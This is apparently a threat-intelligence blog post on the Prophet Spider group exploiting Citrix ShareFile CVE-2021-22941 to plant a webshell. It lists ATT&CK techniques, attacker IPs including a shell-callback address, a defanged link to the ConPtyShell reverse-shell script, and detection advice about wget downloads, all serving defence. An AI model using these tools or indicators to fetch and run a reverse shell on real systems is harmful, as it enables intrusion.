Prophet Spider Exploits Citrix ShareFile to Deploy Webshell

4 min readMar 18, 2022

The adversary group nicknamed Prophet Spider by Crowdstrike has chosen a new vulnerability to include in its exploitation tool kit. This group has been observed leveraging CVE-2021–22941 to deploy an open-source webshell pulled from GitHub. Occasionally, Prophet Spider compromises have resulted in Ransomware infections. In the past, compromises conducted by Prophet Spider have resulted in Ransomware outbreaks. Additionally, adversary objectives frequently include obtaining valid credentials. It is believed that the group has before or currently operates as an access broker; selling access to compromised systems for a price, perhaps even a portion of the ransomware payment.

Recent activity from this group involved resources used in attacks prior to current campaigns (at least WebLogic and Log4j). This suggests that while this group's capabilities are mature, they may reuse infrastructure to some extent — providing blue team defenders an opportunity to potentially disrupt future attacks.

Graph of Prophet Spider’s used Infrastructure

Who

Prophet Spider, like other Spider groups, is an eCriminal adversary group. Campaigns from this group have been observed as early as May 2017. This group focuses on compromising external and vulnerable web services. They are well known to abuse known public vulnerabilities, particularly those with an existing Proof-of-Concept. They have been observed exploiting recent and old vulnerabilities and have used SQL injection attacks. Their targets include Linux and Windows systems.

Unlike other adversaries groups, it does not appear that this group leverages other typical tactics such as password spraying, phishing, trojans/malvertising, or drive-by-downloads (Dark Reading, Prophet Spider Exploits WebLogic CVEs to Enable Ransomware Attacks).

What

In the most recently observed campaigns, attempts to exploit Citrix ShareFile (CVE-2021–22941) were observed. Organizations can remediate this vulnerability by updating their Citrix ShareFile storage zone controller to 5.11.20 or later.

Detections for this activity have also been developed by Emir Erdogan and are available on SOC Prime.

While this group has used many exploits in the past, some recent ones still in use include (CVE-2020–14750, CVE-2020–14882 CVE-2021–26084, CVE-2021–22941)

Graph Generated by chandanbn’s cvss Score Calculator

Why

This group does not seem to maintain its own ransomware nor is it an affiliate member of another Ransomware-as-a-Service (RaaS) as far as we can tell. However, it has been observed that compromises by this group have lead to ransomware attacks in the past. Egregor and MountLocker ransomware are two such malware that compromises from this group have resulted in.

Tactical Intelligence

Tools, Tactics, and Techniques

1. Open Source WebShell: https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1
2. Wget
3. Winn.exe
4. GOTROJ remote access trojan

MITER ATT&CK

Initial Access
T1190: Exploit Public Facing Application
Execution
T1059.001: Command and Scripting Interpreter: PowerShell
Persistence
T1505.003: Server Software Component: Web Shell
Command and Control
T1071: Application Layer Protocol
Command and Control
T1105: Ingress Tool Transfer

Observed Tactics noted by Crowdstrike research.

Indicators of Attack:

188.119.149[.]160 [attacking exploit]

Indicators of Compromise:

45.61.136[.]39:443 [file hosting]

107.181.187[.]184:4242 [shell callback]

Invoke-ConPtyShell.ps1 from https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell

Possible Mitigation Steps to Consider:

Consider reviewing for activity from provided IP address (note that these IPs have been used in campaigns prior to the observed ShareFile exploitation, so historical connections could be related to other adversaries)
Consider monitoring for wget commands pulling files from githubusercontent
Ensure patches for CVE-2020–14750, CVE-2020–14882, CVE-2021–26084, CVE-2021–22941 are applied.
The adversary used a burpcollaborator[.]net token. This is a part of BurpSuite and, while not malicious, may be unexpected in your environment which may provide additional detection/disruption opportunities.
The adversary will continue to evolve their list of used exploits, quick patching reduces future risk of compromise from this adversary and groups like them.